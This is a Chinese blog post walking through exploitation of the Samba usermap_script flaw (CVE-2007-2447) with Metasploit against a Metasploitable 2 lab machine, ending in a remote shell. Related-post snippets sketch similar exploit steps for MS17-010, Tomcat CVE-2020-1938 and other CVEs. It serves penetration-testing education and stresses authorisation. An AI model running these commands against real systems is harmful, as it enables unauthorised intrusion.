利用metasploit攻击Linux的CVE-2007-2447漏洞的全过程

于 2024-06-17 06:30:00 发布
阅读量600 收藏 4
点赞数 9
分类专栏: 网络攻击 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70584783/article/details/139658489
版权

准备工作

  1. 确保法律合规:获得明确的授权和法律允许,因为未经许可的渗透测试是违法的。
  2. 更新Metasploit:确保你的Metasploit框架是最新的。
  3. 靶机与攻击机设置:确保你的靶机(例如Metasploitable 2)已经配置并启用了Samba服务,且攻击机(如Kali Linux)已安装Metasploit框架。

攻击步骤

1. 启动Metasploit Console

打开终端,输入msfconsole启动Metasploit框架。

2. 查找并加载exploit模块

在Metasploit中搜索对应的漏洞利用模块,可以通过命令行输入:

 

Bash
 

1search cve-2007-2447
 

找到相应的模块后,使用use命令加载,例如:
 

 

Bash
 

1use exploit/linux/samba/usermap_script
 

3. 设置攻击参数
 

配置攻击参数,包括RHOST(靶机IP地址)和其他必要的选项。例如:
 

 

Bash
 

1set RHOST 192.168.1.10
 

如果该模块需要设置特定的payload或其他参数,请按照提示或模块的帮助文档进行设置。
 

4. 开始攻击
 

检查所有设置无误后,输入runexploit来执行攻击:
 

 

Bash
 

1exploit
 

Metasploit将尝试利用Samba的usermap_script漏洞,在靶机上执行命令。如果成功,你将获得一个shell或执行特定命令的结果。
 

5. 获取shell与后续操作
 

一旦成功获取到靶机的shell,你可以执行各种命令以进一步探索系统、提升权限、收集敏感信息或执行其他渗透测试任务。
 

6. 记录与报告
 

记录下攻击过程、发现的漏洞、利用步骤及结果,并编写渗透测试报告。强调漏洞的危害性,提出修复建议。
 

注意事项
 

  • 在进行此类活动前,务必确保遵守所有适用的法律和道德规范。
  • 测试应在隔离的测试环境中进行,避免影响生产系统或造成实际损害。
  • 结束测试后,应当彻底清理测试环境,包括移除任何后门、恢复系统至原始状态,并记录所有变更。

                

        

        

    




    

      

        

            

              
                
                  Bonfire356
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    9
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    4
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用

				
			

			

				

					05-17
				

			

		

		

			
				
2018-8174.rb复制到/ usr / share / metasploit-framework / modules / exploits / windows / fileformat / 将CVE-2018-8174.rtf复制到/ usr / share / metasploit-framework / data / exploits / 该漏洞无法与...

			
		

	



                

              
                



	

		

			

				
					
网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程

				
			

			

				

					m0_60607371的博客
				

				

					04-06
					
					1083
					
				

			

		

		

			
				
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。

			
		

	



                


  
              

                


	

		

			

				
					
Metasploitable2靶机之第四篇--Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)

				
			

			

				

					千寻的博客
				

				

					04-02
					
					1748
					
				

			

		

		

			
				
Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)描述

Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。
该软件支持共享打印机、互相传输资料文件等。
Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用漏洞在服务器上执行任意命令。
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。
如果在调用smb.conf中定义的外部脚本时,通过对/b

			
		

	





	

		

			

				
					
SambaMS-RPC Shell命令注入漏洞CVE-2007-2447

					
最新发布

				
			

			

				

					m0_62670778的博客
				

				

					05-11
					
					419
					
				

			

		

		

			
				
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。

			
		

	



		

			
		



	

		

			

				
					
Samba的usermap_script(CVE-2007-2447漏洞整理

				
			

			

				

					野原新之助
				

				

					12-14
					
					1754
					
				

			

		

		

			
				
Username map script 是 Samba 协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行

			
		

	





	

		

			

				
					
Samba远程Shell命令注入执行漏洞CVE-2007-2447

				
			

			

				

					p_utao的博客
				

				

					09-02
					
					2924
					
				

			

		

		

			
				
产生原因
传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行
实验环境
这里使用的目标机是metasploitable2
linux攻击机:192.168.43.113
linux目标机:192.168.43.23

利用攻击
首先对目标机进行扫描,收集可用的服务信息,使用nmap扫描查看系统开放端口和相关的应用程序
msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.16

			
		

	





	

		

			

				
					
metasploit利用linux漏洞,利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)

				
			

			

				

					weixin_39816027的博客
				

				

					05-16
					
					191
					
				

			

		

		

			
				
上个月爆了一个Adobe Flash的漏洞,影响Windows, Macintosh和Linux平台下的Adobe Flash Player 11.2.202.233和之前版本,Android 4.x下Adobe Flash Player 11.1.115.7及之前版本,Android 3.x和2.x下的Adobe Flash Player 11.1.111.8及之前版本存在一个对象混淆引起的严重...

			
		

	





	

		

			

				
					
ProxyLogon-CVE-2021-26855-metasploit:CVE-2021-26855 proxyLogon metasploit利用脚本

				
			

			

				

					03-17
				

			

		

		

			
				
ProxyLogon-CVE-2021-26855-metasploit  CVE-2021-26855 proxyLogon metasploit利用脚本

			
		

	





	

		

			

				
					
0x19.第十九课 MetaSploitcve-2019-0708的漏洞攻击复现.pdf

				
			

			

				

					06-24
				

			

		

		

			
				
0x19.第十九课 MetaSploitcve-2019-0708的漏洞攻击复现.pdf

			
		

	





	

		

			

				
					
exploit_laravel_cve-2018-15133:利用 API_KEY 利用 Laravel 远程代码执行 (CVE-2018-15133)

				
			

			

				

					05-31
				

			

		

		

			
				
针对 CVE-2018-15133 的 Laravel 漏洞利用此代码利用 ,它基于和对该漏洞。 我几乎只是为一个盒子做了这个,因为我现在不想使用 Metasploit,也不想作为练习 Python 的借口。 来自 CVE 的描述: 在 Laravel ...

			
		

	





	

		

			

				
					
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf

				
			

			

				

					12-02
				

			

		

		

			
				
该课程主要讲解了如何利用CVE-2018-4878漏洞进行服务漏洞利用和加固。CVE-2018-4878是一个Adobe Flash Player的安全漏洞,允许攻击者通过特制的SWF文件执行任意代码,从而实现远程控制目标系统。此过程分为多个步骤...

			
		

	





	

		

			

				
					
CVE-2021-21972:CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE

				
			

			

				

					03-08
				

			

		

		

			
				
 CVE-2021-21972 VMware vCenter metasploit利用脚本中的未经授权的RCE 准备 git clone https://github.com/TaroballzChen/CVE-2021-21972 cd CVE-2021-21972 mkdir -p ~ /.msf4/modules/exploits/multi/http cp * ~...

			
		

	





	

		

			

				
					
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞

				
			

			

				

					12-29
				

			

		

		

			
				
Metasploit是一款广泛使用的开源安全工具,它包含了大量预构建的攻击模块,便于安全专家进行漏洞利用。  ms10-046漏洞,也被称为“LNK本地提权漏洞”,是2010年发现的一个严重安全漏洞。这个漏洞主要影响Windows操作...

			
		

	





	

		

			

				
					
fortilogger_arbitrary_fileupload:CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit

				
			

			

				

					05-08
				

			

		

		

			
				
CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit)  日期:30-01-2021  漏洞利用作者:Berkan Er  供应商主页: :  软件链接: :  版本:4.4.2.2  经过测试:Windows 10 Enterprise x64  CVE:...

			
		

	





	

		

			

				
					
CFIX(Samba)服务的使用

				
			

			

				

					心飞扬Q
				

				

					11-18
					
					786
					
				

			

		

		

			
				
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。( ---来...

			
		

	





	

		

			

				
					
20222817 2022-2023-2《网络攻防实践》第七周作业

				
			

			

				

					fuast_liu的博客
				

				

					04-26
					
					104
					
				

			

		

		

			
				
Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明攻击方已经成功获取到了防守方的访问权限。攻击方还输入了ifconfig查看IP地址,发现这里显示的IP地址就是防守方的IP地址,说明攻击方已经成功获取到了防守方的访问权限。

			
		

	





	

		

			

				
					
Samba服务安全漏洞复现及利用[CVE-2007-2447]

				
			

			

				

					sGanYu
				

				

					09-22
					
					3847
					
				

			

		

		

			
				
模拟环境:

攻击工具:kali Linux/nmap/msfconsole

目标:metasploittable2/UNIX


一、使用nmap扫描网段内主机

命令:【nmap -sS -Pn 192.168.200.134】

注:-sS会使nmap执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放,-Pn会告知nmap不执行ping命令预先判断目标是否存活,而是默认主机为存活,也可以尝试使用-A选项

MSF内同样也支持nmap扫描,但是这里-sV会进行探测快放端口以及版本信息扫描
.

			
		

	





	

		

			

				
					
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击

				
			

			

				

					06-09
				

			

		

		

			
				
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤:

1. 打开Metasploit控制台,输入`msfconsole`命令启动。

2. 搜索MS17-010漏洞模块,输入命令`search ms17-010`。

3. 选择对应的漏洞模块,输入命令`use exploit/windows/smb/ms17_010_eternalblue`。

4. 设置目标IP地址,输入命令`set RHOSTS <目标IP地址>`。

5. 设置攻击机监听的IP地址和端口号,输入命令`set LHOST <攻击机IP地址>`和`set LPORT <监听端口号>`。

6. 运行漏洞模块,输入命令`exploit`。

7. 如果攻击成功,将会创建一个会话,可以通过命令`sessions`查看当前会话列表。

8. 输入命令`sessions -i <会话ID>`进入会话,这样就可以执行一些命令,例如`sysinfo`查看目标系统信息,`shell`获取一个交互式shell等。

需要注意的是,这是一种非常危险的行为,必须在合法的环境下使用,否则可能会对他人和自己造成严重的损失。建议在使用前仔细阅读Metasploit的文档和指南,并遵守相关法律法规。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值